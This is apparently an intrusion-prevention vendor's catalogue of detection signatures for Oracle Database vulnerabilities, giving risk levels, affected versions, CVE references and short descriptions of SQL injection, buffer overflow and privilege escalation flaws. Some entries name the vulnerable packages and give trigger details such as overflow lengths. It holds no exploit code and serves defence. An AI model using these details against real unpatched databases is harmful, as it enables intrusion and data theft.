https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0444
Back to top

Oracle-Database-Application-Express-Password-Hash-Disclosure

About this vulnerability: A password has disclosure vulnerability in Oracle APEX
Risk: Moderate
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle APEX; Oracle 11g
Type: Malfunction
Description: There is an information disclosure vulnerability in Oracle Database Application Express (APEX). The vulnerability may allow a remote authenticated attacker to obtain access to password hashes via certain database views. A successful attack attempt will result in disclosure of sensitive information.
Situation: HTTP_CRL-Oracle-Database-Application-Express-Password-Hash-Disclosure
References:
CVE-2009-0981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0981
BID-34461
http://www.securityfocus.com/bid/34461
OSVDB-53738
http://www.osvdb.org/53738
Back to top

Oracle-Database-Core-Rdbms-Component-Denial-Of-Service

About this vulnerability: A vulnerability in Oracle Database Server
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 9i; Oracle 10g
Type: Malfunction
Description: There exists a denial of service vulnerability in the Oracle Database Server. The vulnerability is due to an error in Core RDBMS Component when handling an invalid TNS data packet. Remote unauthenticated attackers could exploit this vulnerability by sending a specially crafted TNS packet. Successful exploitation of the vulnerability would cause complete CPU usage which results in a denial of service condition. In a successful attack case, the target host gets a CPU usage of 100% which results in a denial of service condition. Normal operation cab be restored by stopping and restarting the affected process.
Situation: TNS_CS-Oracle-Database-Core-Rdbms-Component-Denial-Of-Service
References:
CVE-2007-5530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5530
BID-26108
http://www.securityfocus.com/bid/26108
Back to top

Oracle-Database-Ctxsys.drvdisp.tablefunc_asown-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Database
Risk: Moderate
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Oracle's Database server. The vulnerability is due to the way in which parameters are handled by the TABLEFUNC_ASOWN function in the CTXSYS.DRVDISP package. A remote, authenticated attacker could exploit this vulnerability to execute arbitrary code on the target server, in the security context of the Oracle Database service, normally SYSTEM on Windows platforms and an unprivileged user on Unix platforms.
Situation: TNS_CS-Oracle-Database-Ctxsys.drvdisp.tablefunc_asown-Buffer-Overflow
References:
CVE-2011-2301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2301
OSVDB-76520
http://www.osvdb.org/76520
Back to top

Oracle-Database-DBMS-AQADM-Sys-Package-Grant-Type-Access-Procedure-SQL-Injection

About this vulnerability: SQL Injection vulnerability allows priviledge escalation
Risk: Moderate
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: SQL Injection
Description: An SQL injection vulnerability exists in Oracle Database Server product. The vulnerability exists due to insufficient validation of arguments supplied to the GRANT_TYPE_ACCESS function within the DBMS_AQADM_SYS Package. A remote attacker with valid user credentials may leverage this vulnerability to inject and execute SQL code within the security context of the database administrator. Exploitation of this vulnerability may result in privilege escalation allowing an attacker with limited privileges to execute statements with the privileges of the database system administrator. The exact behaviour of the target system is dependent on the intention of the attacker. It may be possible for an attacker to affect the target host beyond the confines of the database which would allow manipulation of the host system.
Situation: TNS_Oracle-Database-DBMS-AQADM-Sys-SQL-Injection
References:
CVE-2009-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0977
BID-34461
http://www.securityfocus.com/bid/34461
Back to top

Oracle-Database-DBMS-Assert-Filter-Bypass

About this vulnerability: SQL injection vulnerability in the Oracle Database Server dbms_assert package
Risk: Moderate
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: SQL Injection
Description: There is an SQL injection vulnerability in the Oracle Database Server dbms_assert package. An authenticated attacker can execute arbitrary SQL code with elevated privileges.
Situation: SMB-TCP_Oracle-Database-DBMS-Assert-Filter-Bypass
Generic_Oracle-Database-DBMS-Assert-Filter-Bypass
TNS_Oracle-Database-DBMS-Assert-Filter-Bypass
References:
CVE-2006-5340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5340
BID-19203
http://www.securityfocus.com/bid/19203
Back to top

Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation

About this vulnerability: Oracle Database Server DBMS_EXPORT_EXTENSION package privilege escalation vulnerability
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 8i; Oracle 9i; Oracle 10g
Type: Malfunction
Description: Oracle Database server does not enforce privileges properly in the built-in package DBMS_EXPORT_EXTENSION. An attacker with basic privileges can create a package which implements the ODCIIndexGetMetadata function. The function will be executed with sysdba privileges, which allows every possible operation to be performed. Also the function ODCIIndexUtilGetTableNames has a similar vulnerability.
Situation: SMB-TCP_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
Generic_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
TNS_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
References:
BID-17590
http://www.securityfocus.com/bid/17590
Back to top

Oracle-Database-DBMS-Scheduler-Privilege-Escalation

About this vulnerability: A vulnerability in Oracle Application Server
Risk: Moderate
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Server; Oracle Database Server
Type: Buffer Overflow
Description: There exists a vulnerability in the Oracle Database Server product. The vulnerability is caused by a flaw in the DBMS_Scheduler package bundled with database installation. An attacker with limited privileges may exploit this vulnerability to gain escalated privileges. Successfully exploiting this vulnerability changes the value of SESSION_USER environment variable to SYS. This will only affect the behaviour of the code which uses this variable to detect the name of the current user. For example, if table policies are set up using the SESSION_USER variable by employing VPD then it may be possible to overcome these policies by exploiting this vulnerability. The general database privileges of the user are not affected.
Situation: Generic_CS-Oracle-Database-DBMS-Scheduler-Privilege-Escalation
TNS_CS-Oracle-Database-DBMS-Scheduler-Privilege-Escalation
References:
CVE-2005-1496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1496
BID-13509
http://www.securityfocus.com/bid/13509
Back to top

Oracle-Database-DBMS-TNS-Listener-Denial-Of-Service

About this vulnerability: Oracle Database DBMS TNS Listener Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Malfunction
Description: A denial of service vulnerability exists in the Oracle Database Server. The vulnerability is due to an input validation error in the TNS Listener component when handling an invalid TNS data packet. Remote unauthenticated attackers could exploit this vulnerability by sending a specially crafted TNS packet. As a result of processing the malicious packet, the server process will terminate resulting in the Denial of Service condition. In a successful attack case, the Listener component process on the server will terminate resulting in the Denial of Service condition. Normal operation can be restored by restarting the affected process.
Situation: TNS_Oracle-Database-DBMS-TNS-Listener-Denial-Of-Service
References:
CVE-2009-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0991
BID-34461
http://www.securityfocus.com/bid/34461
OSVDB-53737
http://www.osvdb.org/53737
Back to top

Oracle-Database-DBMS_Java.Set_Output_To_Java-Privilege-Escalation

About this vulnerability: A vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-285-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 11g
Type: Malfunction
Description: A vulnerability exists in Oracle Database 11g server that could allow users with limited privileges to execute SQL commands with SYS privileges on the server. The vulnerability is due to an access control weakness that allows non-privileged users to execute methods in the DBMS_JAVA package. Remote authenticated users with only CREATE_SESSION privileges can exploit this vulnerability via the SET_OUTPUT_TO_JAVA method and execute arbitrary SQL commands on the target server.
Situation: TNS_CS-Oracle-Database-DBMS-Java.Set-Output-To-Java-Privilege-Escalation
Back to top

Oracle-Database-DBMS_JVM_EXP_PERMS-System-Command-Execution

About this vulnerability: Privilege escalation vulnerability in Oracle Database server
Risk: High
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Oracle Database
Type: Malfunction
Description: There is a privilege escalation vulnerability in Oracle Database server. A remote authenticated attacker with CREATE_SESSION privileges can exploit this vulnerability to execute arbitrary OS commands on a target server.
Situation: Generic_Oracle-Database-DBMS-JVM-EXP-PERMS-System-Command-Execution
TNS_Oracle-Database-DBMS-JVM-EXP-PERMS-System-Command-Execution
References:
BID-38115
http://www.securityfocus.com/bid/38115
Back to top

Oracle-Database-DBMS_Snap_Internal-Package-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Oracle Database Server
Risk: Moderate
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 10g; Oracle 9i
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Oracle Database Server. The flaw is due to a boundary error within the DBMS_SNAP_INTERNAL package of the product. A remote authenticated attacker can exploit this vulnerability by sending an overly long input to the affected package and cause a buffer overflow. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process, usually System/root.
Situation: Generic_Oracle-Database-DBMS-Snap-Internal-Package-Buffer-Overflow
TNS_Oracle-Database-DBMS-Snap-Internal-Package-Buffer-Overflow
References:
CVE-2007-2170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2170
BID-23532
http://www.securityfocus.com/bid/23532
OSVDB-39958
http://www.osvdb.org/39958
Back to top

Oracle-Database-InterMedia-DoS

About this vulnerability: A vulnerability in Oracle Database
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle Database Server
Type: Input Validation
Description: A vulnerability exists in the Oracle Database Server's InterMedia system. This issue is caused by insufficient sanitization of user-supplied data in SQL statements. An attacker with limited privileges may exploit this vulnerability to create a denial of service condition on a vulnerable Oracle Database Server.
Situation: Generic_CS-Oracle-Database-InterMedia-DoS
References:
BID-13239
http://www.securityfocus.com/bid/13239
Back to top

Oracle-Database-REPCAT_RPC.VALIDATE_REMOTE_RC-SQL-Injection

About this vulnerability: SQL injection vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Oracle Database
Type: Input Validation
Description: There is an SQL injection vulnerability in the Oracle Database Server DBMS_REPCAT_RPC package. A remote attacker with the Create Session privileges can exploit this vulnerability to inject and execute arbitrary SQL commands with elevated privileges of the SYS user. As a result, an attacker may disclose sensitive data and compromise data integrity.
Situation: Generic_Oracle-Database-REPCAT-RPC.VALIDATE-REMOTE-RC-SQL-Injection
TNS_Oracle-Database-REPCAT-RPC.VALIDATE-REMOTE-RC-SQL-Injection
References:
CVE-2009-1021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1021
BID-35685
http://www.securityfocus.com/bid/35685
OSVDB-55886
http://www.osvdb.org/55886
Back to top

Oracle-Database-Server-Access-Control-Bypass

About this vulnerability: Access control bypass vulnerability in the Oracle Database Server
Risk: High
First detected in: sgpkg-ips-56-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: SQL Injection
Description: Oracle database products have a privilege escalation vulnerability. An authenticated user is able to execute SQL statements using the AUTH_ALTER_SESSION variable. These SQL statements are executed in the context of the SYS user.
Situation: TNS_Oracle-Database-Server-Access-Control-Bypass
References:
BID-16287
http://www.securityfocus.com/bid/16287
Back to top

Oracle-Database-Server-Authentication-Username-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Oracle Database Servers login functionality
Risk: Moderate
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle 9i;Oracle 8i
Type: Buffer Overflow
Description: Certain versions of Oracle Database server suffer from a vulnerability where supplying an overly long username when logging onto the database server will cause a buffer overflow. To exploit the vulnerability a suitable database client that does not truncate usernames is required. A successful exploit does allows remote attackers to execute arbitrary code on the server.
Situation: TNS_CS-Oracle-Database-Server-Authentication-Username-Buffer-Overflow
References:
CVE-2003-0095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0095
BID-6849
http://www.securityfocus.com/bid/6849
OSVDB-6319
http://www.osvdb.org/6319
Back to top

Oracle-Database-Server-CREATE_TABLES-SQL-Injection

About this vulnerability: SQL injection vulnerability in the Oracle Database Server package CTXSYS.DRVXTABC
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Oracle Database
Type: Input Validation
Description: There is an SQL injection vulnerability in the Oracle Database Server package CTXSYS.DRVXTABC. A remote attacker with Execute privileges for the ctxsys.drvxtabc package can exploit this vulnerability to inject and execute malicious SQL commands on the target system. As a result, an attacker may disclose sensitive data and compromise data integrity.
Situation: Generic_Oracle-Database-Server-CREATE-TABLES-SQL-Injection
TNS_Oracle-Database-Server-CREATE-TABLES-SQL-Injection
References:
CVE-2009-1991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1991
BID-36748
http://www.securityfocus.com/bid/36748
OSVDB-59113
http://www.osvdb.org/59113
Back to top

Oracle-Database-Server-ctxsys.driload-Access-Violation

About this vulnerability: A vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Malfunction
Description: There exists an access validation vulnerability with Oracle database server. There is an Oracle package, which is available to any database user, that allows the execution of SQL queries with database administration privileges. An authenticated attacker may exploit this issue to gain database administrator privileges and execute arbitrary SQL queries on the vulnerable product.
Situation: TNS_Oracle-Oracle-Database-Server-ctxsys.driload-Access-Violation
Back to top

Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Oracle Database Server DBMS_AQELM package. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted SQL statement to the target server. A successful exploitation allows arbitrary code injection and execution with the privileges of the server process, System by default on Windows systems.
Situation: Generic_Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow
TNS_Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow
References:
CVE-2008-2607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2607
BID-30177
http://www.securityfocus.com/bid/30177
OSVDB-47727
http://www.osvdb.org/47727
Back to top

Oracle-Database-Server-DBMS-CDC-PUBLISH-SQL-Injection

About this vulnerability: A vulnerability in Oracle Database 9i Release 2
Risk: High
First detected in: sgpkg-ips-303-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 9i
Type: Input Validation
Description: There is an SQL injection vulnerability in Oracle Database Server 9i Release 2. The vulnerability is due to input validation errors in the DROP_CHANGE_SOURCE and ALTER_CHANGE_SOURCE procedures of the DBMS_CDC_PUBLISH package. Remote authenticated attackers with EXECUTE permission on the SYS.DBMS_CDC_PUBLISH package can exploit this vulnerability by sending a specially crafted parameter to the affected procedures. Successful exploitation can result in disclosure of information, and modification or manipulation of the data in the underlying database.
Situation: Generic_CS-Oracle-Database-Server-DBMS-DCD-PUBLISH-SQL-Injection
TNS_CS-Oracle-Database-Server-DBMS-DCD-PUBLISH-SQL-Injection
References:
CVE-2010-0870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0870
BID-39422
http://www.securityfocus.com/bid/39422
Back to top

Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection

About this vulnerability: Oracle Database Server DBMS_CDC_SUBSCRIBE package SQL injection vulnerability
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 10g
Type: SQL Injection
Description: Oracle Database Server suffers from an SQL injection vulnerability. The DBMS_CDC_SUBSCRIBE package does not parse input correctly, allowing a crafted function call to execute arbitrary SQL commands as the SYS user. The SYS user has the highest privilege level. The vulnerability can be used by a user with execution privileges to the DBMS_CDC_SUBSCRIBE or the DBMS_CDC_ISUBSCRIBE package to execute SQL commands with DBA privileges.
Situation: Generic_Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection
TNS_Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection
References:
CVE-2005-1197
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1197
BID-13236
http://www.securityfocus.com/bid/13236
Back to top

Oracle-Database-Server-Lpxfsmsax-Qname-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Database Server
Risk: Moderate
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database Server
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in Oracle Database Server. The vulnerability is due to insufficient validation of the XML element tag name when a malicious QNAME in a PL/SQL query is encountered. A remote authenticated attacker could exploit this vulnerability by sending a malicious SELECT query to the server. Successful exploitation can allow an attacker to execute arbitrary code on the target system.
Situation: TNS_CS-Oracle-Database-Server-Lpxfsmsax-Qname-Stack-Buffer-Overflow
References:
CVE-2013-3751
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3751
OSVDB-95264
http://www.osvdb.org/95264
Back to top

Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection

About this vulnerability: SQL injection vulnerability in the Oracle Workspace Manager component
Risk: High
First detected in: sgpkg-ips-263-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Oracle Database
Type: Input Validation
Description: There is an SQL injection vulnerability in the Oracle Workspace Manager component. A remote attacker with limited privileges to create PL/SQL functions can exploit this vulnerability to inject and execute privileged SQL statements, compromising the database server.
Situation: Generic_Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection
TNS_Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection
References:
CVE-2009-0978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0978
BID-34461
http://www.securityfocus.com/bid/34461
OSVDB-53734
http://www.osvdb.org/53734
Back to top

Oracle-Database-Server-MD2-Package-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Database Server
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database Server
Type: Input Validation
Description: There is an input validation vulnerability within a package included with Oracle database server. The multidimensional package provides a function that allows for a stack buffer overflow when an overly long string is passed as a parameter. An authenticated attacker may exploit this issue to execute arbitrary code with permission of Oracle database process, or cause a denial of service. In case of a simple attack against this vulnerability, the Oracle database process will disconnect the attacking client and continue to operate normally or the server process will terminate, causing a denial of service. The behaviour of the target in simple attack case will depend on the length of the string passed to the vulnerable function. For Oracle 9i, a string length equal to or greater than 4241 bytes will lead to the termination of the Oracle server causing a global denial of service condition. A string length less than 4241 bytes but equal to or greater than 3962 will lead to the termination of the current connection. A string length less than 3962 will generate a PL/SQL error message. For Oracle 10g, a string length equal to or greater than 173 bytes will lead to the termination of the Oracle server causing a global denial of service condition. A string length less than 173 bytes but equal to or greater than 140 will lead to the termination of the current connection. A string length less than 140 will generate a PL/SQL error message. (Please refer to section 4.1 and 4.2) In case of a more sophisticated attack, arbitrary code may be executed. In this case the behaviour of the attacked target will depend on the nature of the injected code. It is difficult for an attacker to execute code using this vulnerability. Since the attacker must take care to preserve numerous stack values in order to avoid causing error conditions, it would require a sophisticated exploit to inject code and take control of the Oracle server process.
Situation: TNS_Oracle-Database-Server-MD2-Package-Buffer-Overflow
References:
CVE-2004-1774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1774
BID-13145
http://www.securityfocus.com/bid/13145
Back to top

Oracle-Database-Server-MD2-SDO-Code-Size-BOF

About this vulnerability: A vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Buffer Overflow
Description: There exists an input validation vulnerability within a package included with Oracle database server. The multidimensional package provides a function that allows for a stack buffer overflow when an overly long string is passed as a parameter. An authenticated attacker may exploit this issue to execute arbitrary code with permission of Oracle database process, or cause a denial of service.
Situation: Generic_CS-Oracle-Database-Server-MD2-SDO-Code-Size-BOF
Back to top

Oracle-Database-Server-MD2-Validate-Geom-BOF

About this vulnerability: A vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Buffer Overflow
Description: An input validation vulnerability exists within a package included with the Oracle database server. The multidimensional package provides a function that allows for a stack buffer overflow when an overly long string is passed as a parameter. An authenticated attacker may exploit this issue to execute arbitrary code with permission of Oracle database process, or cause a denial of service condition.
Situation: Generic_CS-Oracle-Database-Server-MD2-Validate-Geom-BOF
Back to top

Oracle-Database-Server-SDO_CS-TRANSFORM_LAYER-Buffer-Overflow

About this vulnerability: Oracle database server SDO_CS.TRANSFORM_LAYER buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 8i; Oracle 9i; Oracle 10g
Type: Buffer Overflow
Description: Oracle Database Server suffers from a buffer overflow vulnerability in Oracle Spatial. Oracle Spatial's MDSYS schema contains a package called SDO_CS, whose TRANSFORM_LAYER function cannot handle a large third argument. An argument of over 460 bytes will result in a stack-based buffer overflow, potentially allowing arbitrary code execution with system privileges. An attacker needs execution privileges on the MDSYS.SDO_CS package to exploit this vulnerability.
Situation: Generic_Oracle-Database-Server-SDO-CS-TRANSFORM-LAYER-Buffer-Overflow
TNS_Oracle-Database-Server-SDO-CS-TRANSFORM-LAYER-Buffer-Overflow
References:
CVE-2006-5344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5344
BID-20588
http://www.securityfocus.com/bid/20588
Back to top

Oracle-Database-Server-SQL-Query-Directory-Traversal

About this vulnerability: Directory traversal vulnerability in Oracle Database Server
Risk: Moderate
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 8i; Oracle 9i
Type: Directory Traversal
Description: Oracle Database Server has a directory traversal vulnerability. Insufficient input validation of the file name argument passed to the UTL_FILE function allows an authenticated remote attacker to read, rename, write into, and remove arbitrary files, including those in the Startup folder, on the target file system.
Situation: SMB-TCP_Oracle-Database-Server-SQL-Query-Directory-Traversal
Generic_Oracle-Database-Server-SQL-Query-Directory-Traversal
TNS_Oracle-Database-Server-SQL-Query-Directory-Traversal
References:
CVE-2005-0701
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0701
BID-12749
http://www.securityfocus.com/bid/12749
OSVDB-14631
http://www.osvdb.org/14631
Back to top

Oracle-Database-Server-String-Conversion-Function-BOF

About this vulnerability: A vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Buffer Overflow
Description: There exists an input validation vulnerability with Oracle database server. Oracle database server provides a string conversion function that allows for a stack buffer overflow when certain values are converted to a string representation. An authenticated attacker may exploit this issue to execute an arbitrary code with permission of Oracle database process or cause a denial of service.
Situation: TNS_Oracle-Oracle-Database-Server-String-Conversion-Function-BOF
Back to top

Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection

About this vulnerability: Oracle Database Server SYS.DBMS_METADATA_UTIL SQL injection vulnerability
Risk: High
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 10g; Oracle 9i
Type: SQL Injection
Description: Oracle Database Server's functionality can be extended via extra packages. Numerous packages are intended for internal use only, but can be invoked by users like normal user-accessible packages. The internal package SYS.DBMS_METADATA_UTIL contains four procedures that have SQL injection vulnerabilities. It is possible to include SQL statements into the second and third argument of these procedures, and to get these statements executed in the context of the SYS user.
Situation: Generic_Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection
TNS_Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection
References:
CVE-2006-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0260
BID-16287
http://www.securityfocus.com/bid/16287
OSVDB-22637
http://www.osvdb.org/22637
OSVDB-22643
http://www.osvdb.org/22643
OSVDB-22543
http://www.osvdb.org/22543
Back to top

Oracle-Database-Server-Sys-KUPV-SQL-Injection

About this vulnerability: Oracle Database Server SYS.KUPV SQL injection vulnerability
Risk: High
First detected in: sgpkg-ips-56-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 10g
Type: SQL Injection
Description: Oracle Database Server's functionality can be extended via extra packages. Numerous packages are intended for internal use only, but can be invoked by users like normal user-accessible packages. The internal package KUPV$FT contains three procedures that have SQL injection vulnerabilities, accessible to users with the database role EXECUTE_CATALOG_ROLE. It is possible to include SQL statements in the arguments to these procedures by surrounding the SQL statement in extra quotes and using the concatenation operator.
Situation: Generic_Oracle-Database-Server-Sys-KUPV-SQL-Injection
TNS_Oracle-Database-Server-Sys-KUPV-SQL-Injection
References:
BID-16287
http://www.securityfocus.com/bid/16287
Back to top

Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection

About this vulnerability: Oracle Database Server Workspace Manager SQL injection
Risk: Low
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 9i; Oracle 10g; Oracle 11g
Type: Input Validation
Description: There are multiple SQL injection vulnerabilities in the Oracle Database Server product. The vulnerabilities are due to insufficient sanitization of input parameters in the Oracle Workspace Manager component. A remote attacker with valid user credentials may leverage these vulnerabilities to inject and execute SQL code with escalated privileges of the SYS or WMSYS account. Successful exploitation can result in disclosure of sensitive information, and modification or manipulation of the data in the underlying database.
Situation: Generic_CS-Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection
TNS_CS-Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection
References:
CVE-2008-3982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3982
BID-31683
http://www.securityfocus.com/bid/31683
Back to top

Oracle-Database-Server-XDB-Pitrig-Procedures-SQL-Injection

About this vulnerability: A vulnerability in Oracle Database Server
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database Server; Oracle Application Server
Type: Input Validation
Description: There exists an SQL injection vulnerability in Oracle Database Server product. The vulnerability exists due to insufficient validation of arguments supplied to procedures PITRIG_TRUNCATE and PITRIG_DROP in XDB.XDB_PITRIG_PKG package. A remote attacker with valid user credentials may leverage this vulnerability to inject and execute arbitrary SQL code within the security context of the database system administrator. Exploitation of this vulnerability may result in privilege escalation allowing an attacker with limited privileges to execute statements with the privileges of the database system administrator. The exact behaviour of the target system is dependent on the intention of the attacker. It may be possible for an attacker to affect the target host beyond the confines of the database which would allow manipulation of the host system.
Situation: TNS_CS-Oracle-Database-Server-XDB-Pitrig-Procedures-SQL-Injection
References:
BID-27229
http://www.securityfocus.com/bid/27229
Back to top

Oracle-Database-Server-Xdb.dbms_xmlschema-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Database Server
Risk: Moderate
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the Oracle Database Server product. The vulnerability exists due to insufficient validation of the arguments supplied to DBMS_XMLSCHEMA packages. A remote attacker with valid user credentials may use this vulnerability to execute arbitrary code with privileges of the database server process. In case the attack is aiming at a denial of service attack, the vulnerable Oracle database server process will terminate, and the database service will no longer be available until it is restarted. It is also possible that the database data will be corrupted during the database server termination. In case the attacker has successfully injected and executed malicious code on the vulnerable target host, the behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker runs with the privileges of the Oracle database server process. On Windows systems, the Oracle database server process runs as the System user.
Situation: TNS_Oracle-Oracle-Database-Server-Xdb.dbms_xmlschema-Buffer-Overflow
References:
CVE-2006-0272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0272
Back to top

Oracle-Database-Server_DBMS-Metadata-Package-SQL-Injection

About this vulnerability: Oracle Database Server DBMS_METADATA package SQL injection vulnerability
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 9i; Oracle 10g
Type: SQL Injection
Description: Oracle Database Server suffers from an SQL injection vulnerability. The DBMS_METADATA package does not parse input correctly, allowing a crafted function call to execute arbitrary SQL commands as the SYS user. The SYS user has the highest privilege level. The vulnerability can be used by a user with execution privilege to the DBMS_METADATA package to execute SQL commands with DBA privileges.
Situation: Generic_Oracle-Database-Server-DBMS-Metadata-Package-SQL-Injection
TNS_Oracle-Database-Server-DBMS-Metadata-Package-SQL-Injection
References:
BID-13238
http://www.securityfocus.com/bid/13238
Back to top

Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass

About this vulnerability: A vulnerability in Oracle Database
Risk: Low
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database
Type: Malfunction
Description: There is a security bypass vulnerability in Oracle Database Server. The flaw is due to improper enforcement of user permissions on data access to tables through certain types of views. A remote authenticated attacker may use this vulnerability to perform UPDATE, DELETE and INSERT operations without having proper privileges.
Situation: Generic_Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass
